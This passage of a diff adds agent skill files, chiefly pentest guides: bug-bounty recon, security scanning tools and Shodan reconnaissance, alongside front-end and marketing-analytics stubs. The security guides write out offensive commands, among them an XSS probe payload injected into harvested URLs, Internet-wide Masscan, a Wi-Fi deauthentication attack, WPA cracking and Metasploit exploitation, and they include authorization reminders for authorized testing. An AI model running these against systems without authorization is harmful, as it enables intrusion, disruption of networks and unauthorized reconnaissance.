|
||||
- Has the site had past writeups/exploits?
|
||||
|
||||
### 7. Automated XSS Hunting
|
||||
|
||||
```bash
|
||||
# ParamSpider for parameter extraction
|
||||
python3 paramspider.py --domain target.com -o params.txt
|
||||
|
||||
# Filter with Gxss
|
||||
cat params.txt | Gxss -p test
|
||||
|
||||
# Dalfox for XSS testing
|
||||
cat params.txt | dalfox pipe --mining-dict params.txt -o xss_results.txt
|
||||
|
||||
# Alternative workflow
|
||||
waybackurls target.com | grep "=" | qsreplace '"><script>alert(1)</script>' | while read url; do
|
||||
curl -s "$url" | grep -q 'alert(1)' && echo "$url"
|
||||
done > potential_xss.txt
|
||||
```
|
||||
|
||||
### 8. Vulnerability Scanning
|
||||
|
||||
```bash
|
||||
# Nuclei comprehensive scan
|
||||
nuclei -l hosts.txt -t ~/nuclei-templates/ -o nuclei_results.txt
|
||||
|
||||
# Check for common CVEs
|
||||
nuclei -l hosts.txt -t cves/ -o cve_results.txt
|
||||
|
||||
# Web vulnerabilities
|
||||
nuclei -l hosts.txt -t vulnerabilities/ -o vuln_results.txt
|
||||
```
|
||||
|
||||
### 9. API Enumeration
|
||||
|
||||
**Wordlists for API fuzzing:**
|
||||
|
||||
```bash
|
||||
# Enumerate API endpoints
|
||||
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
|
||||
|
||||
# Test API versions
|
||||
ffuf -u https://target.com/api/v1/FUZZ -w api_wordlist.txt
|
||||
ffuf -u https://target.com/api/v2/FUZZ -w api_wordlist.txt
|
||||
|
||||
# Check for hidden methods
|
||||
for method in GET POST PUT DELETE PATCH; do
|
||||
curl -X $method https://target.com/api/users -v
|
||||
done
|
||||
```
|
||||
|
||||
### 10. Automated Recon Script
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
domain=$1
|
||||
|
||||
if [[ -z $domain ]]; then
|
||||
echo "Usage: ./recon.sh <domain>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mkdir -p "$domain"
|
||||
|
||||
# Subdomain enumeration
|
||||
echo "[*] Enumerating subdomains..."
|
||||
subfinder -d "$domain" -silent > "$domain/subs.txt"
|
||||
|
||||
# Live host discovery
|
||||
echo "[*] Finding live hosts..."
|
||||
cat "$domain/subs.txt" | httpx -title -tech-detect -status-code > "$domain/live.txt"
|
||||
|
||||
# URL collection
|
||||
echo "[*] Collecting URLs..."
|
||||
cat "$domain/live.txt" | waybackurls > "$domain/urls.txt"
|
||||
|
||||
# Nuclei scanning
|
||||
echo "[*] Running Nuclei..."
|
||||
nuclei -l "$domain/live.txt" -o "$domain/nuclei.txt"
|
||||
|
||||
echo "[+] Recon complete!"
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| Amass | Subdomain enumeration |
|
||||
| Subfinder | Fast subdomain discovery |
|
||||
| httpx/httprobe | Live host detection |
|
||||
| ffuf | Content discovery |
|
||||
| Nuclei | Vulnerability scanning |
|
||||
| Burp Suite | Manual testing |
|
||||
| Dalfox | XSS automation |
|
||||
| waybackurls | Historical URL mining |
|
||||
|
||||
### Key API Endpoints to Check
|
||||
|
||||
```
|
||||
/api/v1/users
|
||||
/api/v1/admin
|
||||
/api/v1/profile
|
||||
/api/users/me
|
||||
/api/config
|
||||
/api/debug
|
||||
/api/swagger
|
||||
/api/graphql
|
||||
```
|
||||
|
||||
### XSS Filter Testing
|
||||
|
||||
```html
|
||||
<!-- Test encoding handling -->
|
||||
<h1><img><table>
|
||||
<script>
|
||||
%3Cscript%3E
|
||||
%253Cscript%253E
|
||||
%26lt;script%26gt;
|
||||
```
|
||||
|
||||
## Constraints

- Respect program scope boundaries
- Avoid DoS or fuzzing on production systems without permission
- Rate-limit requests to avoid being blocked
- Some tools may generate false positives
- API keys are required for the full functionality of some tools

## Examples

### Example 1: Quick Subdomain Recon

```bash
subfinder -d target.com | httpx -title | tee results.txt
```

### Example 2: XSS Hunting Pipeline

```bash
waybackurls target.com | grep "=" | qsreplace "test" | httpx -silent | dalfox pipe
```

### Example 3: Comprehensive Scan

```bash
# Full recon chain
amass enum -d target.com | httpx | nuclei -t ~/nuclei-templates/
```

## Troubleshooting

| Issue | Solution |
|-------|----------|
| Rate limited | Use proxy rotation, reduce concurrency |
| Too many results | Focus on specific technology stacks |
| False positives | Manually verify findings before reporting |
| Missing subdomains | Combine multiple enumeration sources |
| API key errors | Verify keys in config files |
| Tools not found | Install Go tools with `go install` |
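For the "Missing subdomains" row, merging enumerator output is a one-liner; the two sample files below stand in for subfinder/amass results (hypothetical names):

```bash
# Merge and deduplicate subdomain lists from multiple sources.
printf 'a.example.com\nb.example.com\n' > /tmp/subs_subfinder.txt
printf 'b.example.com\nc.example.com\n' > /tmp/subs_amass.txt
sort -u /tmp/subs_subfinder.txt /tmp/subs_amass.txt > /tmp/subs_all.txt
cat /tmp/subs_all.txt    # 3 unique hosts
```

The same `sort -u` pattern scales to any number of source files.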
51
skills/salesforce-development/SKILL.md
Normal file
@@ -0,0 +1,51 @@
---
name: salesforce-development
description: "Expert patterns for Salesforce platform development including Lightning Web Components (LWC), Apex triggers and classes, REST/Bulk APIs, Connected Apps, and Salesforce DX with scratch orgs and 2nd generation packages (2GP). Use when: salesforce, sfdc, apex, lwc, lightning web components."
source: vibeship-spawner-skills (Apache 2.0)
---

# Salesforce Development

## Patterns

### Lightning Web Component with Wire Service

Use the @wire decorator for reactive data binding with Lightning Data Service
or Apex methods. @wire fits LWC's reactive architecture and enables
Salesforce's performance optimizations.

### Bulkified Apex Trigger with Handler Pattern

Apex triggers must be bulkified to handle 200+ records per transaction.
Use the handler pattern for separation of concerns, testability, and
recursion prevention.

### Queueable Apex for Async Processing

Use Queueable Apex for async processing with support for non-primitive
types, monitoring via AsyncApexJob, and job chaining. Limits: 50 jobs
per transaction, 1 child job when chaining.

## Anti-Patterns

### ❌ SOQL Inside Loops

### ❌ DML Inside Loops

### ❌ Hardcoding IDs

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
586
skills/scanning-tools/SKILL.md
Normal file
@@ -0,0 +1,586 @@
---
name: Security Scanning Tools
description: This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". It provides comprehensive guidance on security scanning tools and methodologies.
---

# Security Scanning Tools

## Purpose

Master essential security scanning tools for network discovery, vulnerability assessment, web application testing, wireless security, and compliance validation. This skill covers tool selection, configuration, and practical usage across different scanning categories.

## Prerequisites

### Required Environment

- Linux-based system (Kali Linux recommended)
- Network access to target systems
- Proper authorization for scanning activities

### Required Knowledge

- Basic networking concepts (TCP/IP, ports, protocols)
- Understanding of common vulnerabilities
- Familiarity with command-line interfaces

## Outputs and Deliverables

1. **Network Discovery Reports** - Identified hosts, ports, and services
2. **Vulnerability Assessment Reports** - CVEs, misconfigurations, risk ratings
3. **Web Application Security Reports** - OWASP Top 10 findings
4. **Compliance Reports** - CIS benchmarks, PCI-DSS, HIPAA checks

## Core Workflow

### Phase 1: Network Scanning Tools

#### Nmap (Network Mapper)

Primary tool for network discovery and security auditing:

```bash
# Host discovery
nmap -sn 192.168.1.0/24              # Ping scan (no port scan)
nmap -sL 192.168.1.0/24              # List scan (DNS resolution)
nmap -Pn 192.168.1.100               # Skip host discovery

# Port scanning techniques
nmap -sS 192.168.1.100               # TCP SYN scan (stealth)
nmap -sT 192.168.1.100               # TCP connect scan
nmap -sU 192.168.1.100               # UDP scan
nmap -sA 192.168.1.100               # ACK scan (firewall detection)

# Port specification
nmap -p 80,443 192.168.1.100         # Specific ports
nmap -p- 192.168.1.100               # All 65535 ports
nmap -p 1-1000 192.168.1.100         # Port range
nmap --top-ports 100 192.168.1.100   # Top 100 common ports

# Service and OS detection
nmap -sV 192.168.1.100               # Service version detection
nmap -O 192.168.1.100                # OS detection
nmap -A 192.168.1.100                # Aggressive (OS, version, scripts)

# Timing and performance
nmap -T0 192.168.1.100               # Paranoid (slowest, IDS evasion)
nmap -T4 192.168.1.100               # Aggressive (faster)
nmap -T5 192.168.1.100               # Insane (fastest)

# NSE Scripts
nmap --script=vuln 192.168.1.100     # Vulnerability scripts
nmap --script=http-enum 192.168.1.100  # Web enumeration
nmap --script=smb-vuln* 192.168.1.100  # SMB vulnerabilities
nmap --script=default 192.168.1.100  # Default script set

# Output formats
nmap -oN scan.txt 192.168.1.100      # Normal output
nmap -oX scan.xml 192.168.1.100      # XML output
nmap -oG scan.gnmap 192.168.1.100    # Grepable output
nmap -oA scan 192.168.1.100          # All formats
```
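Grepable output (`-oG`) is easy to post-process in a pipeline; a sketch with a hand-made sample line standing in for a real scan result (assumption):

```bash
# Pull open TCP ports out of Nmap grepable (-oG) output.
cat > /tmp/sample.gnmap <<'EOF'
Host: 192.168.1.100 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///
EOF
grep -oE '[0-9]+/open/tcp' /tmp/sample.gnmap | cut -d/ -f1
```

Only the `open` entries survive the grep, so closed/filtered ports are dropped automatically.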
#### Masscan

High-speed port scanning for large networks:

```bash
# Basic scanning
masscan -p80 192.168.1.0/24 --rate=1000
masscan -p80,443,8080 192.168.1.0/24 --rate=10000

# Full port range
masscan -p0-65535 192.168.1.0/24 --rate=5000

# Large-scale scanning
masscan 0.0.0.0/0 -p443 --rate=100000 --excludefile exclude.txt

# Output formats
masscan -p80 192.168.1.0/24 -oG results.gnmap
masscan -p80 192.168.1.0/24 -oJ results.json
masscan -p80 192.168.1.0/24 -oX results.xml

# Banner grabbing
masscan -p80 192.168.1.0/24 --banners
```

### Phase 2: Vulnerability Scanning Tools

#### Nessus

Enterprise-grade vulnerability assessment:

```bash
# Start Nessus service
sudo systemctl start nessusd

# Access web interface
# https://localhost:8834

# Command-line (nessuscli)
nessuscli scan --create --name "Internal Scan" --targets 192.168.1.0/24
nessuscli scan --list
nessuscli scan --launch <scan_id>
nessuscli report --format pdf --output report.pdf <scan_id>
```

Key Nessus features:

- Comprehensive CVE detection
- Compliance checks (PCI-DSS, HIPAA, CIS)
- Custom scan templates
- Credentialed scanning for deeper analysis
- Regular plugin updates

#### OpenVAS (Greenbone)

Open-source vulnerability scanning:

```bash
# Install OpenVAS
sudo apt install openvas
sudo gvm-setup

# Start services
sudo gvm-start

# Access web interface (Greenbone Security Assistant)
# https://localhost:9392

# Command-line operations
gvm-cli socket --xml "<get_version/>"
gvm-cli socket --xml "<get_tasks/>"

# Create and run scan
gvm-cli socket --xml '
<create_target>
  <name>Test Target</name>
  <hosts>192.168.1.0/24</hosts>
</create_target>'
```

### Phase 3: Web Application Scanning Tools

#### Burp Suite

Comprehensive web application testing:

```
# Proxy configuration
1. Set browser proxy to 127.0.0.1:8080
2. Import Burp CA certificate for HTTPS
3. Add target to scope

# Key modules:
- Proxy: Intercept and modify requests
- Spider: Crawl web applications
- Scanner: Automated vulnerability detection
- Intruder: Automated attacks (fuzzing, brute-force)
- Repeater: Manual request manipulation
- Decoder: Encode/decode data
- Comparer: Compare responses
```

Core testing workflow:

1. Configure proxy and scope
2. Spider the application
3. Analyze the sitemap
4. Run the active scanner
5. Manual testing with Repeater/Intruder
6. Review findings and generate a report

#### OWASP ZAP

Open-source web application scanner:

```bash
# Start ZAP
zaproxy

# Automated scan from CLI
zap-cli quick-scan https://target.com

# Full scan
zap-cli spider https://target.com
zap-cli active-scan https://target.com

# Generate report
zap-cli report -o report.html -f html

# API mode
zap.sh -daemon -port 8080 -config api.key=<your_key>
```

ZAP automation:

```bash
# Docker-based scanning
docker run -t owasp/zap2docker-stable zap-full-scan.py \
  -t https://target.com -r report.html

# Baseline scan (passive only)
docker run -t owasp/zap2docker-stable zap-baseline.py \
  -t https://target.com -r report.html
```

#### Nikto

Web server vulnerability scanner:

```bash
# Basic scan
nikto -h https://target.com

# Scan specific port
nikto -h target.com -p 8080

# Scan with SSL
nikto -h target.com -ssl

# Multiple targets
nikto -h targets.txt

# Output formats
nikto -h target.com -o report.html -Format html
nikto -h target.com -o report.xml -Format xml
nikto -h target.com -o report.csv -Format csv

# Tuning options
nikto -h target.com -Tuning 123456789   # All tests
nikto -h target.com -Tuning x           # Exclude specific tests
```

### Phase 4: Wireless Scanning Tools

#### Aircrack-ng Suite

Wireless network penetration testing:

```bash
# Check wireless interface
airmon-ng

# Enable monitor mode
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Capture specific network
sudo airodump-ng -c <channel> --bssid <target_bssid> -w capture wlan0mon

# Deauthentication attack
sudo aireplay-ng -0 10 -a <bssid> wlan0mon

# Crack WPA handshake
aircrack-ng -w wordlist.txt -b <bssid> capture*.cap

# Crack WEP
aircrack-ng -b <bssid> capture*.cap
```

#### Kismet

Passive wireless detection:

```bash
# Start Kismet
kismet

# Specify interface
kismet -c wlan0

# Access web interface
# http://localhost:2501

# Detect hidden networks
# Kismet passively collects all beacon frames,
# including those from hidden SSIDs
```

### Phase 5: Malware and Exploit Scanning

#### ClamAV

Open-source antivirus scanning:

```bash
# Update virus definitions
sudo freshclam

# Scan directory
clamscan -r /path/to/scan

# Scan with verbose output
clamscan -r -v /path/to/scan

# Move infected files
clamscan -r --move=/quarantine /path/to/scan

# Remove infected files
clamscan -r --remove /path/to/scan

# Scan specific file types
clamscan -r --include='\.exe$|\.dll$' /path/to/scan

# Output to log
clamscan -r -l scan.log /path/to/scan
```
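The `--include` pattern above can be dry-run with `find`/`grep` before pointing ClamAV at a large tree; the sample files below are stand-ins:

```bash
# List only .exe/.dll files, mirroring clamscan's --include filter.
mkdir -p /tmp/scan_demo
touch /tmp/scan_demo/a.exe /tmp/scan_demo/b.dll /tmp/scan_demo/c.txt
find /tmp/scan_demo -type f | grep -E '\.(exe|dll)$'
```

This shows exactly which files the filter would cover without running a scan.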
#### Metasploit Vulnerability Validation

Validate vulnerabilities with exploitation:

```bash
# Start Metasploit
msfconsole

# Database setup
msfdb init
db_status

# Import Nmap results
db_import /path/to/nmap_scan.xml

# Vulnerability scanning
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

# Auto exploitation
vulns       # View vulnerabilities
analyze     # Suggest exploits
```

### Phase 6: Cloud Security Scanning

#### Prowler (AWS)

AWS security assessment:

```bash
# Install Prowler
pip install prowler

# Basic scan
prowler aws

# Specific checks
prowler aws -c iam s3 ec2

# Compliance framework
prowler aws --compliance cis_aws

# Output formats
prowler aws -M html json csv

# Specific region
prowler aws -f us-east-1

# Assume role
prowler aws -R arn:aws:iam::123456789012:role/ProwlerRole
```

#### ScoutSuite (Multi-cloud)

Multi-cloud security auditing:

```bash
# Install ScoutSuite
pip install scoutsuite

# AWS scan
scout aws

# Azure scan
scout azure --cli

# GCP scan
scout gcp --user-account

# Generate report
scout aws --report-dir ./reports
```

### Phase 7: Compliance Scanning

#### Lynis

Security auditing for Unix/Linux:

```bash
# Run audit
sudo lynis audit system

# Quick scan
sudo lynis audit system --quick

# Specific profile
sudo lynis audit system --profile server

# Output report
sudo lynis audit system --report-file /tmp/lynis-report.dat

# Check specific section
sudo lynis show profiles
sudo lynis audit system --tests-from-group malware
```

#### OpenSCAP

Security compliance scanning:

```bash
# List available profiles
oscap info /usr/share/xml/scap/ssg/content/ssg-<distro>-ds.xml

# Run scan with profile
oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_pci-dss \
  --report report.html \
  /usr/share/xml/scap/ssg/content/ssg-rhel8-ds.xml

# Generate fix script
oscap xccdf generate fix \
  --profile xccdf_org.ssgproject.content_profile_pci-dss \
  --output remediation.sh \
  /usr/share/xml/scap/ssg/content/ssg-rhel8-ds.xml
```

### Phase 8: Scanning Methodology

Structured scanning approach:

1. **Planning**
   - Define scope and objectives
   - Obtain proper authorization
   - Select appropriate tools

2. **Discovery**
   - Host discovery (Nmap ping sweep)
   - Port scanning
   - Service enumeration

3. **Vulnerability Assessment**
   - Automated scanning (Nessus/OpenVAS)
   - Web application scanning (Burp/ZAP)
   - Manual verification

4. **Analysis**
   - Correlate findings
   - Eliminate false positives
   - Prioritize by severity

5. **Reporting**
   - Document findings
   - Provide remediation guidance
   - Write an executive summary
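The five phases above can be sketched as a driver script; the echo bodies are placeholders (assumptions) to be replaced with real tool invocations per engagement:

```bash
# Skeleton engagement driver mirroring the methodology phases.
phase()    { echo "[phase] $1"; }
plan()     { phase "planning: scope, authorization, tool selection"; }
discover() { phase "discovery: hosts, ports, services"; }
assess()   { phase "assessment: automated scans + manual verification"; }
analyze()  { phase "analysis: correlate, de-duplicate, prioritize"; }
report()   { phase "reporting: findings, remediation, executive summary"; }

plan; discover; assess; analyze; report
```

Keeping each phase as a function makes it easy to log timestamps or skip phases on re-runs.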
### Phase 9: Tool Selection Guide

Choose the right tool for each scenario:

| Scenario | Recommended Tools |
|----------|-------------------|
| Network Discovery | Nmap, Masscan |
| Vulnerability Assessment | Nessus, OpenVAS |
| Web App Testing | Burp Suite, ZAP, Nikto |
| Wireless Security | Aircrack-ng, Kismet |
| Malware Detection | ClamAV, YARA |
| Cloud Security | Prowler, ScoutSuite |
| Compliance | Lynis, OpenSCAP |
| Protocol Analysis | Wireshark, tcpdump |

### Phase 10: Reporting and Documentation

Generate professional reports:

```bash
# Nmap XML to HTML (uses the stylesheet referenced in the XML)
xsltproc -o report.html nmap-output.xml

# OpenVAS report export
gvm-cli socket --xml '<get_reports report_id="<id>" format_id="<pdf_format>"/>'

# Combine multiple scan results
# Use tools like Faraday, Dradis, or custom scripts

# Executive summary template:
# 1. Scope and methodology
# 2. Key findings summary
# 3. Risk distribution chart
# 4. Critical vulnerabilities
# 5. Remediation recommendations
# 6. Detailed technical findings
```

## Quick Reference

### Nmap Cheat Sheet

| Scan Type | Command |
|-----------|---------|
| Ping Scan | `nmap -sn <target>` |
| Quick Scan | `nmap -T4 -F <target>` |
| Full Scan | `nmap -p- <target>` |
| Service Scan | `nmap -sV <target>` |
| OS Detection | `nmap -O <target>` |
| Aggressive | `nmap -A <target>` |
| Vuln Scripts | `nmap --script=vuln <target>` |
| Stealth Scan | `nmap -sS -T2 <target>` |

### Common Ports Reference

| Port | Service |
|------|---------|
| 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP |
| 53 | DNS |
| 80 | HTTP |
| 443 | HTTPS |
| 445 | SMB |
| 3306 | MySQL |
| 3389 | RDP |
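The table above translates directly into a small lookup helper for triage scripts (default assignments only; real services can of course run on any port):

```bash
# Map a default port number to its usual service name.
port_service() {
  case "$1" in
    21) echo FTP ;;     22) echo SSH ;;    23) echo Telnet ;;  25) echo SMTP ;;
    53) echo DNS ;;     80) echo HTTP ;;   443) echo HTTPS ;;  445) echo SMB ;;
    3306) echo MySQL ;; 3389) echo RDP ;;  *) echo unknown ;;
  esac
}

port_service 443   # -> HTTPS
```

Piping a scanner's port list through this helper gives a quick human-readable summary.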
## Constraints and Limitations

### Legal Considerations

- Always obtain written authorization
- Respect scope boundaries
- Follow responsible disclosure practices
- Comply with local laws and regulations

### Technical Limitations

- Some scans may trigger IDS/IPS alerts
- Heavy scanning can impact network performance
- False positives require manual verification
- Encrypted traffic may limit analysis

### Best Practices

- Start with non-intrusive scans
- Gradually increase scan intensity
- Document all scanning activities
- Validate findings before reporting

## Troubleshooting

### Scan Not Detecting Hosts

**Solutions:**

1. Try different discovery methods: `nmap -Pn` or `nmap -sn` with `-PS`/`-PA`/`-PU` probes
2. Check firewall rules blocking ICMP
3. Use TCP SYN probes: `nmap -PS22,80,443`
4. Verify network connectivity

### Slow Scan Performance

**Solutions:**

1. Increase timing: `nmap -T4` or `-T5`
2. Reduce the port range: `--top-ports 100`
3. Use Masscan for initial discovery
4. Disable DNS resolution: `-n`

### Web Scanner Missing Vulnerabilities

**Solutions:**

1. Authenticate to access protected areas
2. Increase crawl depth
3. Add custom injection points
4. Use multiple tools for coverage
5. Perform manual testing
263
skills/scroll-experience/SKILL.md
Normal file
@@ -0,0 +1,263 @@
---
name: scroll-experience
description: "Expert in building immersive scroll-driven experiences - parallax storytelling, scroll animations, interactive narratives, and cinematic web experiences. Like NY Times interactives, Apple product pages, and award-winning web experiences. Makes websites feel like experiences, not just pages. Use when: scroll animation, parallax, scroll storytelling, interactive story, cinematic website."
source: vibeship-spawner-skills (Apache 2.0)
---

# Scroll Experience

**Role**: Scroll Experience Architect

You see scrolling as a narrative device, not just navigation. You create
moments of delight as users scroll. You know when to use subtle animations
and when to go cinematic. You balance performance with visual impact. You
make websites feel like movies you control with your thumb.

## Capabilities

- Scroll-driven animations
- Parallax storytelling
- Interactive narratives
- Cinematic web experiences
- Scroll-triggered reveals
- Progress indicators
- Sticky sections
- Scroll snapping

## Patterns

### Scroll Animation Stack

Tools and techniques for scroll animations.

**When to use**: When planning scroll-driven experiences

#### Library Options

| Library | Best For | Learning Curve |
|---------|----------|----------------|
| GSAP ScrollTrigger | Complex animations | Medium |
| Framer Motion | React projects | Low |
| Locomotive Scroll | Smooth scroll + parallax | Medium |
| Lenis | Smooth scroll only | Low |
| CSS scroll-timeline | Simple, native | Low |

#### GSAP ScrollTrigger Setup

```javascript
import { gsap } from 'gsap';
import { ScrollTrigger } from 'gsap/ScrollTrigger';

gsap.registerPlugin(ScrollTrigger);

// Basic scroll animation
gsap.to('.element', {
  scrollTrigger: {
    trigger: '.element',
    start: 'top center',
    end: 'bottom center',
    scrub: true, // Links animation to scroll position
  },
  y: -100,
  opacity: 1,
});
```

#### Framer Motion Scroll

```jsx
import { motion, useScroll, useTransform } from 'framer-motion';

function ParallaxSection() {
  const { scrollYProgress } = useScroll();
  const y = useTransform(scrollYProgress, [0, 1], [0, -200]);

  return (
    <motion.div style={{ y }}>
      Content moves with scroll
    </motion.div>
  );
}
```

#### CSS Native (2024+)

```css
@keyframes reveal {
  from { opacity: 0; transform: translateY(50px); }
  to { opacity: 1; transform: translateY(0); }
}

.animate-on-scroll {
  animation: reveal linear;
  animation-timeline: view();
  animation-range: entry 0% cover 40%;
}
```

### Parallax Storytelling

Tell stories through scroll depth.

**When to use**: When creating narrative experiences

#### Layer Speeds

| Layer | Speed | Effect |
|-------|-------|--------|
| Background | 0.2x | Far away, slow |
| Midground | 0.5x | Middle depth |
| Foreground | 1.0x | Normal scroll |
| Content | 1.0x | Readable |
| Floating elements | 1.2x | Pop forward |

#### Creating Depth

```javascript
// GSAP parallax layers
gsap.to('.background', {
  scrollTrigger: {
    scrub: true
  },
  y: '-20%', // Moves slower
});

gsap.to('.foreground', {
  scrollTrigger: {
    scrub: true
  },
  y: '-50%', // Moves faster
});
```

#### Story Beats

```
Section 1: Hook (full viewport, striking visual)
    ↓ scroll
Section 2: Context (text + supporting visuals)
    ↓ scroll
Section 3: Journey (parallax storytelling)
    ↓ scroll
Section 4: Climax (dramatic reveal)
    ↓ scroll
Section 5: Resolution (CTA or conclusion)
```

#### Text Reveals

- Fade in on scroll
- Typewriter effect on trigger
- Word-by-word highlight
- Sticky text with changing visuals

### Sticky Sections

Pin elements while scrolling through content.

**When to use**: When content should stay visible during scroll

#### CSS Sticky

```css
.sticky-container {
  height: 300vh; /* Space for scrolling */
}

.sticky-element {
  position: sticky;
  top: 0;
  height: 100vh;
}
```

#### GSAP Pin

```javascript
gsap.to('.content', {
  scrollTrigger: {
    trigger: '.section',
    pin: true,      // Pins the section
    start: 'top top',
    end: '+=1000',  // Pin for 1000px of scroll
    scrub: true,
  },
  // Animate while pinned
  x: '-100vw',
});
```

#### Horizontal Scroll Section

```javascript
const sections = gsap.utils.toArray('.panel');

gsap.to(sections, {
  xPercent: -100 * (sections.length - 1),
  ease: 'none',
  scrollTrigger: {
    trigger: '.horizontal-container',
    pin: true,
    scrub: 1,
    end: () => '+=' + document.querySelector('.horizontal-container').offsetWidth,
  },
});
```

#### Use Cases

- Product feature walkthrough
- Before/after comparisons
- Step-by-step processes
- Image galleries

## Anti-Patterns

### ❌ Scroll Hijacking

**Why bad**: Users hate losing scroll control.
Accessibility nightmare.
Breaks back-button expectations.
Frustrating on mobile.

**Instead**: Enhance scroll, don't replace it.
Keep natural scroll speed.
Use scrub animations.
Allow users to scroll normally.

### ❌ Animation Overload

**Why bad**: Distracting, not delightful.
Performance tanks.
Content becomes secondary.
User fatigue.

**Instead**: Less is more.
Animate key moments.
Static content is okay.
Guide attention, don't overwhelm.

### ❌ Desktop-Only Experience

**Why bad**: Mobile is the majority of traffic.
Touch scroll behaves differently.
Performance issues on phones.
Unusable experience.

**Instead**: Mobile-first scroll design.
Simpler effects on mobile.
Test on real devices.
Graceful degradation.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Animations stutter during scroll | high | Fix scroll jank: animate transform/opacity only |
| Parallax breaks on mobile devices | high | Mobile-safe parallax: reduce or disable layers on touch |
| Scroll experience is inaccessible | medium | Accessible scroll: respect `prefers-reduced-motion` |
| Critical content hidden below animations | medium | Content-first scroll design |

## Related Skills

Works well with: `3d-web-experience`, `frontend`, `ui-design`, `landing-page-design`
50
skills/segment-cdp/SKILL.md
Normal file
@@ -0,0 +1,50 @@
---
name: segment-cdp
description: "Expert patterns for Segment Customer Data Platform including Analytics.js, server-side tracking, tracking plans with Protocols, identity resolution, destinations configuration, and data governance best practices. Use when: segment, analytics.js, customer data platform, cdp, tracking plan."
source: vibeship-spawner-skills (Apache 2.0)
---

# Segment CDP

## Patterns

### Analytics.js Browser Integration

Client-side tracking with Analytics.js. Include track, identify, page,
and group calls. The anonymous ID persists until an identify call merges
it with a known user.

### Server-Side Tracking with Node.js

High-performance server-side tracking using @segment/analytics-node.
Non-blocking with internal batching. Essential for backend events,
webhooks, and sensitive data.
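Under the hood, the client libraries post to Segment's HTTP Tracking API. A minimal sketch of a Track payload (the write key, userId, and event are placeholders; the curl call is shown commented since it needs real credentials):

```bash
# Build a Track payload in the shape Segment's HTTP Tracking API expects.
cat > /tmp/track.json <<'EOF'
{
  "userId": "user_123",
  "event": "Order Completed",
  "properties": { "revenue": 49.99, "currency": "USD" }
}
EOF

# Send it with basic auth on the write key (reference only, not executed here):
# curl -s https://api.segment.io/v1/track \
#   -u "$SEGMENT_WRITE_KEY:" \
#   -H 'Content-Type: application/json' \
#   -d @/tmp/track.json
grep -q '"event"' /tmp/track.json && echo "payload ready"
```

Note the event name follows the Object + Action convention described below in the tracking plan pattern.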
### Tracking Plan Design

Design event schemas using the Object + Action naming convention.
Define required properties, types, and validation rules.
Connect to Protocols for enforcement.

## Anti-Patterns

### ❌ Dynamic Event Names

### ❌ Tracking Properties as Events

### ❌ Missing Identify Before Track

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | low | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
500
skills/shodan-reconnaissance/SKILL.md
Normal file
@@ -0,0 +1,500 @@
---
|
||||
name: Shodan Reconnaissance and Pentesting
|
||||
description: This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports." It provides comprehensive guidance for using Shodan's search engine, CLI, and API for penetration testing reconnaissance.
|
||||
---
|
||||
|
||||
# Shodan Reconnaissance and Pentesting
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide systematic methodologies for leveraging Shodan as a reconnaissance tool during penetration testing engagements. This skill covers the Shodan web interface, command-line interface (CLI), REST API, search filters, on-demand scanning, and network monitoring capabilities for discovering exposed services, vulnerable systems, and IoT devices.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
- **Shodan Account**: Free or paid account at shodan.io
|
||||
- **API Key**: Obtained from Shodan account dashboard
|
||||
- **Target Information**: IP addresses, domains, or network ranges to investigate
|
||||
- **Shodan CLI**: Python-based command-line tool installed
|
||||
- **Authorization**: Written permission for reconnaissance on target networks
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
- **Asset Inventory**: List of discovered hosts, ports, and services
|
||||
- **Vulnerability Report**: Identified CVEs and exposed vulnerable services
|
||||
- **Banner Data**: Service banners revealing software versions
|
||||
- **Network Mapping**: Geographic and organizational distribution of assets
|
||||
- **Screenshot Gallery**: Visual reconnaissance of exposed interfaces
|
||||
- **Exported Data**: JSON/CSV files for further analysis
|
||||
|
||||
## Core Workflow

### 1. Setup and Configuration

#### Install Shodan CLI

```bash
# Using pip
pip install shodan

# Or in an isolated environment with pipx
pipx install shodan

# On BlackArch/Arch Linux
sudo pacman -S python-shodan
```

#### Initialize API Key

```bash
# Set your API key
shodan init YOUR_API_KEY

# Verify setup
shodan info
# Output: Query credits available: 100
#         Scan credits available: 100
```

#### Check Account Status

```bash
# View credits and plan info
shodan info

# Check your external IP
shodan myip

# Check CLI version
shodan version
```
### 2. Basic Host Reconnaissance

#### Query Single Host

```bash
# Get all information about an IP
shodan host 1.1.1.1

# Example output:
# 1.1.1.1
# Hostnames: one.one.one.one
# Country: Australia
# Organization: Mountain View Communications
# Number of open ports: 3
# Ports:
#     53/udp
#     80/tcp
#    443/tcp
```

#### Check if Host is Honeypot

```bash
# Get honeypot probability score (0.0-1.0)
shodan honeyscore 203.0.113.50

# Output: Not a honeypot
# Score: 0.3
```
### 3. Search Queries

#### Basic Search (Free)

```bash
# Simple keyword search (no credits consumed)
shodan search apache

# Specify output fields
shodan search --fields ip_str,port,os smb
```

